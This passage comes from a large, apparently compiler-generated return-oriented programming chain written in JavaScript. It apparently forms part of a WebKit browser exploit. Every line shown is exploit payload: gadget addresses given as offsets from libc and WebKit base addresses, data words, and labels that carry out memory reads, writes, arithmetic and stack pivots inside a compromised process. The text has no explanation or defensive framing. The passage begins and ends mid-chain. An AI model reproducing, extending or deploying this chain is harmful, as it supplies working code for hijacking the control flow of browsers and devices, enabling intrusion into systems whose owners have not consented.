libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+322104, //L6389
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6389:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6390:
db([37, 0]); // 0x25
set_gadget(libc_base+144605,); //pop rdi
//L6391:
db([37, 0]); // 0x25
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+322248, //L6392
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+322280, //L6394
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+322264, //L6393
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6392:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6393:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6394:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+6378709, //cmp rax, rcx ; sete al
libc_base+346125, //setne al
libc_base+226597, //movzx eax, al
libc_base+764760, //pop rsi
ropchain+322456, //L6396
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+322472, //L6397
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+322440, //L6395
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6395:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6396:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6397:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+322584, //L6399
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+322632, //L6402
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+322600, //L6400
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L6399:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6400:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6401:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6402:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+21212296, //cmp rax, rsi ; sete al
libc_base+226597, //movzx eax, al
webkit_base+5507491, //shl rax, 3
libc_base+764760, //pop rsi
ropchain+322744, //L6403+8
libc_base+501454, //add rax, rsi
libc_base+501611, //mov rax, [rax]
libc_base+764760, //pop rsi
ropchain+322736, //L6403
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+782311 //pop rsp
]);
//L6403:
db([0, 0]); // 0x0
set_gadgets([
ropchain+322760, //L6403+24
ropchain+326648, //L6398
libc_base+764760, //pop rsi
ropchain+322800, //L6404
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6404:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6406:
db([32, 0]); // 0x20
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+322920, //L6409
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+322904, //L6407
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6407:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6409:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+323064, //L6412
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+323032, //L6410
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+323048, //L6411
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6410:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6411:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6412:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+323144, //L6413
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6413:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6415:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+323264, //L6418
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+323248, //L6416
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6416:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6418:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+323408, //L6421
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+323376, //L6419
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+323392, //L6420
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6419:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6420:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6421:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+323496, //L6423
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6422:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6423:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+323552, //L6424
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6424:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6426:
db([4294967272, 4294967295]); // -0x18
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+323632, //L6428
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6428:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+323744, //L6429
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6429:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6431:
db([24, 0]); // 0x18
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+323864, //L6434
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+323848, //L6432
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6432:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6434:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+324008, //L6437
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+323976, //L6435
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+323992, //L6436
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6435:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6436:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6437:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+324088, //L6438
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6438:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6440:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+324208, //L6443
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+324192, //L6441
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6441:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6443:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+324288, //L6444
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+324304, //L6445
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6444:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6445:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+324464, //L6449
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+324432, //L6447
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+324448, //L6448
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6446:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6447:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6448:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6449:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+324520, //L6451
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6451:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+324648, //L6453
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+324664, //L6454
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+324632, //L6452
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6452:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6453:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6454:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+324824, //L6458
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+324792, //L6456
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+324808, //L6457
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6455:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6456:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6457:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6458:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+324880, //L6460
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6460:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+325008, //L6462
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+325024, //L6463
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+324992, //L6461
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6461:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6462:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6463:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+325184, //L6467
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+325152, //L6465
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+325168, //L6466
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6464:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6465:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6466:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6467:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+325240, //L6469
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6469:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+325368, //L6471
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+325384, //L6472
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+325352, //L6470
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6470:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6471:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6472:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+325464, //L6473
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+325480, //L6474
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6473:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6474:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+325576, //L6476
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+325560, //L6475
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6475:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6476:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+325656, //L6477
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6477:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6479:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+325776, //L6482
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+325760, //L6480
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6480:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6482:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+325856, //L6484
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+325888, //L6486
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6484:
db([0, 0]); // 0x0
set_gadgets([
libc_base+759608, //pop rax
//L6485:
ropchain+326016, //L6483
libc_base+144605 //pop rdi
]);
//L6486:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+325992, //L6488
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+326008, //L6487
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L6488:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L6487:
db([0, 0]); // 0x0
//L6483:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760 //pop rsi
]);
db([4294967264, 4294967295]); // -0x20
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+326088, //L6489
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6489:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6491:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+326208, //L6494
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+326192, //L6492
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6492:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6494:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+326352, //L6497
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+326320, //L6495
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+326336, //L6496
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6495:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6496:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6497:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+326440, //L6499
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6498:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6499:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+326496, //L6500
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6500:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6502:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+326576, //L6504
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6504:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+782311, //pop rsp
ropchain+318872, //L6308
libc_base+782311, //pop rsp
ropchain+327216, //L6505
//L6398:
libc_base+764760, //pop rsi
ropchain+326688, //L6506
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6506:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6508:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+326808, //L6511
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+326792, //L6509
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6509:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6511:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+326952, //L6514
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+326920, //L6512
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+326936, //L6513
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6512:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6513:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6514:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+327040, //L6516
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+764760 //pop rsi
]);
//L6515:
db([1, 0]); // 0x1
set_gadget(libc_base+759608,); //pop rax
//L6516:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+327096, //L6517
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6517:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6519:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+20307877, //mov [rax], rcx
libc_base+764760, //pop rsi
ropchain+327176, //L6521
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6521:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
//L6505:
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+327272, //L6523
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6522:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L6523:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6524:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+327352, //L6525
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6525:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6527:
db([4294967292, 4294967295]); // -0x4
set_gadgets([
libc_base+501454, //add rax, rsi
webkit_base+3488438, //mov [rax], ecx
libc_base+764760, //pop rsi
ropchain+327432, //L6529
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6529:
db([0, 0]); // 0x0
//L6528:
set_gadgets([
libc_base+764760, //pop rsi
ropchain+327480, //L6531
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L6531:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L6533:
db([40, 0]); // 0x28
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+327600, //L6536
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+327584, //L6534
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6534:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6536:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+327680, //L6537
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+327696, //L6538
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L6537:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6538:
db([0, 0]); // 0x0
set_gadgets([
libc_base+223440, //mov al, [rdi]
libc_base+764760, //pop rsi
ropchain+327856, //L6542
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+327824, //L6540
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+327840, //L6541
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6539:
db([24, 0]); // 0x18
set_gadget(webkit_base+3236123,); //pop r9
//L6540:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L6541:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L6542:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+327912, //L6544
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L6544:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+328040, //L6546
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+328056, //L6547
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+328024, //L6545
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L6545:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L6546:
db([0, 0]); // 0x0
